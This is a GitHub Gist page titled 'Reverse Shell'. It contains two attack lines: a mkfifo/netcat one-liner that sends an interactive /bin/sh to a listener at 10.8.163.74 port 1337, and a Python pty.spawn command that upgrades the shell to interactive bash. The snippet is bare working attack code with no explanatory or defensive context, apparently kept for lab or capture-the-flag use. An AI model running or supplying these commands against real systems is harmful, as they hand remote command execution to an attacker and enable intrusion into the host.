Last active
March 22, 2021 14:19
-
-
Save afiqiqmal/78b0d7dea5bdd92f0a2b594a66526ac5 to your computer and use it in GitHub Desktop.
Reverse Shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.8.163.74 1337 >/tmp/f | |
python -c 'import pty; pty.spawn("/bin/bash")' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment